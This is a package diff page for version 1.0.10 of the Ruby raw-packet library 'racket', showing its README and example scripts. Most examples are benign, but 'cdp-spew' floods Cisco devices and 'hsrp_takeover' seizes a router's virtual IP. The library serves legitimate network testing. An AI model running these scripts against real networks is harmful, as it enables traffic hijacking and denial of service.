RubyGems - racket - Versions diffs - 1.0.10 - Mend

racket 1.0.10

Files changed (88) hide show

data/README +76 -0
data/examples/arp-send +24 -0
data/examples/arp-send2 +30 -0
data/examples/cdp +39 -0
data/examples/cdp-spew +52 -0
data/examples/dhcp +42 -0
data/examples/dhcp-spew +48 -0
data/examples/dns +38 -0
data/examples/egp +30 -0
data/examples/hsrp +43 -0
data/examples/hsrp_takeover +69 -0
data/examples/icmp-recv +34 -0
data/examples/icmp-spew +50 -0
data/examples/icmpv6 +84 -0
data/examples/icmpv6-spew +50 -0
data/examples/igmpv1 +27 -0
data/examples/igmpv2 +27 -0
data/examples/igrp-send +25 -0
data/examples/ipv6 +35 -0
data/examples/ntp +38 -0
data/examples/ntp2 +42 -0
data/examples/sctp +32 -0
data/examples/stp-send +21 -0
data/examples/synflood +147 -0
data/examples/tcp +43 -0
data/examples/tcp2udp +65 -0
data/examples/udp +46 -0
data/examples/vrrp +34 -0
data/examples/vtp +28 -0
data/lib/racket.rb +4 -0
data/lib/racket/l2.rb +30 -0
data/lib/racket/l2/eightotwodotthree.rb +48 -0
data/lib/racket/l2/ethernet.rb +62 -0
data/lib/racket/l2/llc.rb +50 -0
data/lib/racket/l2/misc.rb +67 -0
data/lib/racket/l2/snap.rb +40 -0
data/lib/racket/l2/vlan.rb +61 -0
data/lib/racket/l2/vtp.rb +124 -0
data/lib/racket/l3.rb +30 -0
data/lib/racket/l3/arp.rb +63 -0
data/lib/racket/l3/cdp.rb +85 -0
data/lib/racket/l3/egp.rb +53 -0
data/lib/racket/l3/ipv4.rb +132 -0
data/lib/racket/l3/ipv6.rb +66 -0
data/lib/racket/l3/misc.rb +165 -0
data/lib/racket/l3/stp.rb +81 -0
data/lib/racket/l4.rb +30 -0
data/lib/racket/l4/gre.rb +65 -0
data/lib/racket/l4/icmp.rb +295 -0
data/lib/racket/l4/icmpv6.rb +446 -0
data/lib/racket/l4/igmpv1.rb +79 -0
data/lib/racket/l4/igmpv2.rb +76 -0
data/lib/racket/l4/igrp.rb +138 -0
data/lib/racket/l4/misc.rb +35 -0
data/lib/racket/l4/sctp.rb +163 -0
data/lib/racket/l4/tcp.rb +152 -0
data/lib/racket/l4/udp.rb +81 -0
data/lib/racket/l4/vrrp.rb +95 -0
data/lib/racket/l5.rb +30 -0
data/lib/racket/l5/bootp.rb +106 -0
data/lib/racket/l5/dns.rb +110 -0
data/lib/racket/l5/hsrp.rb +73 -0
data/lib/racket/l5/misc.rb +35 -0
data/lib/racket/l5/ntp.rb +59 -0
data/lib/racket/misc.rb +30 -0
data/lib/racket/misc/lv.rb +108 -0
data/lib/racket/misc/misc.rb +61 -0
data/lib/racket/misc/orderedhash.rb +63 -0
data/lib/racket/misc/raw.rb +35 -0
data/lib/racket/misc/tlv.rb +103 -0
data/lib/racket/misc/vt.rb +114 -0
data/lib/racket/racket.rb +164 -0
data/lib/racket/racketpart.rb +66 -0
data/test/l2/ts_ethernet.rb +22 -0
data/test/l2/ts_misc.rb +23 -0
data/test/l2/ts_vlan.rb +15 -0
data/test/l3/ts_ipv4.rb +44 -0
data/test/l3/ts_ipv6.rb +26 -0
data/test/l3/ts_misc.rb +31 -0
data/test/l4/ts_icmp.rb +38 -0
data/test/l4/ts_tcp.rb +55 -0
data/test/l4/ts_udp.rb +40 -0
data/test/misc/ts_lv.rb +59 -0
data/test/misc/ts_orderedhash.rb +33 -0
data/test/misc/ts_tlv.rb +47 -0
data/test/misc/ts_vt.rb +56 -0
data/test/ts_all.rb +14 -0
metadata +182 -0

data/README ADDED Viewed

@@ -0,0 +1,76 @@
+#  $Id: README 179 2010-10-15 06:29:49Z jhart $
+Racket -- Ruby Raw Packet library.
+Comments, concerns, bugs, money, food, libations to:
+  Jon Hart <jhart@spoofed.org>
+Installation is simple:
+  gem install --source http://spoofed.org/files/racket/ racket
+If you desire the source:
+  svn co http://spoofed.org/racket/svn racket
+Includes support for reading and writing most major layer 2, 3, 4 and
+5 protocols.
+Basic packet construction and writing is as simple (!) as walking
+the stack:
+  require 'rubygems'
+  require 'racket'
+  include Racket
+  unless (ARGV.size == 4)
+    puts "Usage: #{$0} <srcip> <dstip> <dst_port> <size>"
+    exit
+  end
+  # create a new Racket object and pick an interface
+  n = Racket::Racket.new
+  n.iface = "eth0"
+  # skip right to layer3, layer2 will be done automatically
+  # build a new IPv4 layer, and assign src and dst ip from the command line
+  n.l3 = IPv4.new
+  n.l3.src_ip = ARGV[0]
+  n.l3.dst_ip = ARGV[1]
+  n.l3.protocol = 0x11
+  # tack on UDP
+  n.l4 = UDP.new
+  # randomize source port
+  n.l4.src_port = 1024 + rand(65535-1024)
+  # take destination port from the commandline
+  n.l4.dst_port = ARGV[2].to_i
+  # build a random amount of garbage for the payload
+  n.l4.payload = Misc.randstring(ARGV[3].to_i)
+  # fix 'er  up (checksum, length) prior to sending
+  n.l4.fix!(n.l3.src_ip, n.l3.dst_ip)
+  # off you go
+  f = n.sendpacket
+  # print out what we built
+  n.layers.compact.each do |l|
+    puts l.pretty
+  end
+  puts "Sent #{f}"
+Packet reading, done through something like Pcap, is pretty straight forward too:
+  require 'rubygems'
+  require 'racket'
+  # Get the raw capture data from somewhere.  In this case, I've hardcoded it
+  binary = "\x45\x10\x00\x3c\x2f\xdf\x40\x00\x40\x06\x89\x17\xc0\xa8\x00\x64\xc0\xa8\x00\x01\x99\xb7\x00\x35\x29\x39\x28\x66\x00\x00\x00\x00\xa0\x02\x16\xd0\xbc\x04\x00\x00\x02\x04\x05\xb4\x04\x02\x08\x0a\x00\x31\x07\xb9\x00\x00\x00\x00\x01\x03\x03\x07"
+  i = Racket::IPv4.new(binary)
+  # this will print it out all pretty like, and should show a 60 byte TCP packet from 192.168.0.100 to 192.168.0.1
+  puts i.pretty

data/examples/arp-send ADDED Viewed

@@ -0,0 +1,24 @@
+#!/usr/bin/env ruby
+#
+# $Id: arp-send 153 2009-12-13 06:29:10Z jhart $
+#
+# Example that just writes a simple arp packet to eth0
+require 'rubygems'
+require 'racket'
+include Racket
+unless (ARGV.size == 2)
+  puts "Usage: #{$0} <interface> <opcode>"
+  exit
+end
+n = Racket::Racket.new
+n.iface = ARGV[0]
+n.l2 = L2::Ethernet.new(Misc.randstring(14))
+n.l2.ethertype = 0x0806
+n.l3 = L3::ARP.new
+n.l3.opcode = ARGV[1].to_i
+n.sendpacket

data/examples/arp-send2 ADDED Viewed

@@ -0,0 +1,30 @@
+#!/usr/bin/env ruby
+#
+# $Id: arp-send2 153 2009-12-13 06:29:10Z jhart $
+#
+# Send an arp packet that is VLAN tagged
+require 'rubygems'
+require 'racket'
+unless (ARGV.size == 7)
+  puts "Usage: #{$0} <interface> <vlan> <opcode> <sha> <spa> <tha> <tpa>"
+  exit
+end
+include Racket
+n = Racket::Racket.new
+n.iface = ARGV[0]
+n.l2 = L2::Ethernet.new(Misc.randstring(14))
+n.l2.ethertype = 0x8100
+n.l3 = L2::VLAN.new
+n.l3.type = 0x0806
+n.l3.id = ARGV[1].to_i
+n.l4 = L3::ARP.new
+n.l4.opcode = ARGV[2].to_i
+n.l4.sha = ARGV[3]
+n.l4.spa = ARGV[4]
+n.l4.tha = ARGV[5]
+n.l4.tpa = ARGV[6]
+n.sendpacket

data/examples/cdp ADDED Viewed

@@ -0,0 +1,39 @@
+#!/usr/bin/env ruby
+#
+# $Id: cdp 154 2009-12-13 19:52:32Z jhart $
+#
+# Send amusing CDP packets
+require 'rubygems'
+require 'racket'
+unless (ARGV.size == 1)
+  puts "Usage: #{$0} <interface>"
+  exit
+end
+include Racket
+n = Racket::Racket.new
+n.iface = ARGV[0]
+n.layers[2] = L2::EightOTwoDotThree.new(Misc.randstring(14))
+n.layers[2].dst_mac = "01:00:0c:cc:cc:cc"
+n.layers[2].length = 0
+n.layers[3] = L2::LLC.new()
+n.layers[4] = L2::SNAP.new()
+n.layers[4].pid = 0x2000
+n.layers[5] = L3::CDP.new()
+n.layers[5].version = 1
+n.layers[5].add_field(1, "CDP, FTW!")
+n.layers[5].add_field(3, "PetabitEthernet0/1")
+n.layers[5].add_field(5, "Some really old version of IOS that nobody, except you, uses.")
+n.layers[5].add_field(6, "Linux")
+n.layers[5].add_field(4, "\xff\xff\xff\xff") # capabilities galore!
+n.layers[5].add_field(9, "wtf.edu") # vlan management domain
+n.layers[5].add_field(10, "\x00\x20")
+n.layers.compact.each do |l|
+  puts l.pretty
+end
+n.sendpacket

data/examples/cdp-spew ADDED Viewed

@@ -0,0 +1,52 @@
+#!/usr/bin/env ruby
+#
+# $Id: cdp-spew 156 2009-12-14 02:27:22Z jhart $
+#
+# Spew CDP packets to all Cisco devices on the network
+#
+# Jon Hart <jhart@spoofed.org>
+require 'rubygems'
+require 'racket'
+include Racket
+unless (ARGV.size >= 1)
+  puts "Usage: #{$0} <iface> [num fields per CDP packet]"
+  exit
+end
+def tick
+  @it += 1
+  @it = 0 if @it >= @ticks.size
+  print "\r#{@ticks[@it]}"
+  STDOUT.flush
+end
+def randcdp
+  @n.layers[2] = L2::EightOTwoDotThree.new(Misc.randstring(14))
+  @n.layers[2].dst_mac = "01:00:0c:cc:cc:cc"
+  @n.layers[2].length = 0
+  @n.layers[3] = L2::LLC.new()
+  @n.layers[4] = L2::SNAP.new()
+  @n.layers[4].pid = 0x2000
+  @n.layers[5] = L3::CDP.new()
+  @n.layers[5].version = 1
+  limit = ARGV[1].to_i || 100
+  1.upto(limit) do |f|
+    @n.layers[5].add_field(f, Misc.randstring(5))
+  end
+  @n.sendpacket
+  tick
+end
+@it = 0
+@ticks = %w( / - \\ | )
+@n = Racket::Racket.new
+@n.iface = ARGV[0]
+puts "Spewing..."
+while (true)
+  randcdp
+end

data/examples/dhcp ADDED Viewed

@@ -0,0 +1,42 @@
+#!/usr/bin/env ruby
+#
+# $Id: dhcp 174 2010-08-21 22:26:52Z jhart $
+#
+# Send useless DHCP packets
+require 'rubygems'
+require 'racket'
+include Racket
+unless (ARGV.size == 2)
+  puts "Usage: #{$0} <srcip> <dstip>"
+  exit
+end
+n = Racket::Racket.new
+n.iface = "eth0"
+n.layers[3] = L3::IPv4.new
+n.layers[3].src_ip = ARGV[0]
+n.layers[3].dst_ip = ARGV[1]
+n.layers[3].version = 4
+n.layers[3].hlen = 0x5 #
+n.layers[3].ttl = 44
+n.layers[3].protocol = 0x11
+n.layers[4] = L4::UDP.new
+n.layers[4].src_port = 68
+n.layers[4].dst_port = 67
+n.layers[5] = L5::BOOTP.new
+n.layers[5].yip = "192.168.0.4"
+n.layers[5].file = "foobar?"
+n.layers[4].payload = n.layers[5]
+n.layers[4].fix!(n.layers[3].src_ip, n.layers[3].dst_ip)
+n.layers[4].payload = ""
+f = n.sendpacket
+puts "Sent! #{f}"
+# vim: set ts=2 et sw=2:

data/examples/dhcp-spew ADDED Viewed

@@ -0,0 +1,48 @@
+#!/usr/bin/env ruby
+#
+# $Id: dhcp-spew 174 2010-08-21 22:26:52Z jhart $
+#
+# Send useless DHCP packets
+require 'rubygems'
+require 'racket'
+include Racket
+unless (ARGV.size == 2)
+  puts "Usage: #{$0} <srcip> <dstip>"
+  exit
+end
+n = Racket::Racket.new
+n.iface = "eth0"
+n.layers[3] = L3::IPv4.new
+n.layers[3].src_ip = ARGV[0]
+n.layers[3].dst_ip = ARGV[1]
+n.layers[3].version = 4
+n.layers[3].hlen = 0x5 #
+n.layers[3].ttl = 44
+n.layers[3].protocol = 0x11
+n.layers[4] = L4::UDP.new
+n.layers[4].src_port = 68
+n.layers[4].dst_port = 67
+n.layers[5] = L5::BOOTP.new
+n.layers[5].type = 1
+n.layers[5].id = 0x12345
+n.layers[5].yip = "192.168.0.4"
+n.layers[5].chaddr = "00:de:ad:ba:be:ff"
+#n.layers[5].file = "foobar?"
+#n.layers[5].add_option(4, "\x11\x22\x33\x44")
+n.layers[5].add_option(53, "\x01")
+n.layers[5].fix!
+n.layers[4].payload = n.layers[5]
+n.layers[4].fix!(n.layers[3].src_ip, n.layers[3].dst_ip)
+n.layers[4].payload = ""
+f = n.sendpacket
+puts "Sent! #{f}"
+# vim: set ts=2 et sw=2:

data/examples/dns ADDED Viewed

@@ -0,0 +1,38 @@
+#!/usr/bin/env ruby
+#
+# $Id: dns 172 2010-03-16 07:07:04Z jhart $
+#
+# Send a DNS request
+require 'rubygems'
+require 'racket'
+include Racket
+unless (ARGV.size == 3)
+  puts "Usage: #{$0} <srcip> <dstip> <domain>"
+  exit
+end
+n = Racket::Racket.new
+n.iface = "eth0"
+n.l3 = Racket::L3::IPv4.new
+n.l3.src_ip = ARGV[0]
+n.l3.dst_ip = ARGV[1]
+n.l3.protocol = 0x11
+n.l4 = Racket::L4::UDP.new
+n.l4.src_port = 48484
+n.l4.dst_port = 53
+n.l5 = Racket::L5::DNS.new
+n.l5.add_question(ARGV[2], 1, 1)
+n.l4.payload = n.l5
+n.l4.fix!(n.l3.src_ip, n.l3.dst_ip)
+n.l4.payload = ""
+f = n.sendpacket
+n.layers.compact.each do |l|
+  puts l.pretty
+end
+puts "Sent #{f}"

data/examples/egp ADDED Viewed

@@ -0,0 +1,30 @@
+#!/usr/bin/env ruby
+#
+# $Id: egp 174 2010-08-21 22:26:52Z jhart $
+#
+require 'rubygems'
+require 'racket'
+include Racket
+unless (ARGV.size == 3)
+  puts "Usage: #{$0} <srcip> <dstip> <code>"
+  exit
+end
+n = Racket::Racket.new
+n.iface = "eth0"
+n.l3 = L3::IPv4.new
+n.l3.src_ip = ARGV[0]
+n.l3.dst_ip = ARGV[1]
+n.l3.protocol = 0x8
+n.l4 = L3::EGP.new
+n.l4.code = ARGV[2].to_i
+f = n.sendpacket
+n.layers.compact.each do |l|
+  puts l.pretty
+end
+puts "Sent #{f}"

data/examples/hsrp ADDED Viewed

@@ -0,0 +1,43 @@
+#!/usr/bin/env ruby
+#
+# $Id: hsrp 174 2010-08-21 22:26:52Z jhart $
+#
+#
+# Make all of your Cisco devices unhappy by hurling HSRP packets
+# at them.  Hot, Hot HSRP takeover.
+require 'rubygems'
+require 'racket'
+include Racket
+unless (ARGV.size == 3)
+  puts "Usage: #{$0} <srcip> <group> <vip>"
+  exit
+end
+n = Racket::Racket.new
+n.iface = "eth0"
+n.l2 = L2::Ethernet.new(Misc.randstring(14))
+n.l2.ethertype = 0x0800
+n.l2.dst_mac = "01:00:5e:00:00:02"
+n.l3 = L3::IPv4.new
+n.l3.protocol = 17
+n.l3.dst_ip = "224.0.0.2"
+n.l3.src_ip = ARGV[0]
+n.l4 = L4::UDP.new
+n.l4.src_port = 1985
+n.l4.dst_port = 1985
+n.l5 = L5::HSRP.new
+n.l5.vip = ARGV[2]
+n.l5.group = ARGV[1].to_i
+n.l4.payload = n.l5
+n.l4.fix!(n.l3.src_ip, n.l3.dst_ip)
+n.l4.payload = ""
+n.sendpacket
+puts n.pretty

data/examples/hsrp_takeover ADDED Viewed

@@ -0,0 +1,69 @@
+#!/usr/bin/env ruby
+#
+# $Id: hsrp_takeover 174 2010-08-21 22:26:52Z jhart $
+#
+#
+# Listen for HSRP broadcasts and use the information learned
+# therein to perform an active "takeover" of that VIP.  Evil.
+#
+# Jon Hart <jhart@spoofed.org>
+require 'rubygems'
+require 'pcaprub'
+require 'racket'
+include Racket
+if (ARGV.size != 2)
+  puts "Usage: #{$0} <iface> <new router>"
+  exit
+end
+iface = ARGV[0]
+router = ARGV[1]
+begin
+  p = Pcap::open_live(iface, 1500, true, 1000)
+  unless (iface.nil?)
+    p.setfilter("! host #{router}")
+  end
+rescue Exception => e
+  puts "Pcap: Cannot open device #{ARGV[0]}: #{e}"
+  exit
+end
+# prep our new takeover.
+takeover = Racket::Racket.new
+takeover.l3 = L3::IPv4.new
+takeover.l3.src_ip = router
+takeover.l3.dst_ip = "224.0.0.2"
+takeover.l3.protocol = 17
+takeover.l4 = L4::UDP.new
+takeover.l4.src_port = 1985
+takeover.l4.dst_port = 1985
+p.each do |pkt|
+  if (p.datalink == Pcap::DLT_EN10MB)
+      puts "Found ethernet"
+    eth = L2::Ethernet.new(pkt)
+    if (eth.ethertype == 0x0800)
+      ip = L3::IPv4.new(eth.payload)
+      if (ip.protocol == 17)
+        udp = L4::UDP.new(ip.payload)
+        if (udp.src_port == 1985 && udp.dst_port == 1985)
+          takeover.l5 = L5::HSRP.new(udp.payload)
+          takeover.l5.opcode = L5::HSRP::HSRP_HELLO
+          takeover.l5.state = L5::HSRP::HSRP_ACTIVE
+          takeover.l5.priority = 0xffff
+          takeover.l4.payload = takeover.l5
+          takeover.l4.fix!(takeover.l3.src_ip, takeover.l3.dst_ip)
+          takeover.l4.payload = ""
+          puts "Perfoming takeover on #{takeover.l5.vip}"
+          takeover.sendpacket
+        end
+      end
+    end
+  end
+end
+# vim: set ts=2 et sw=2: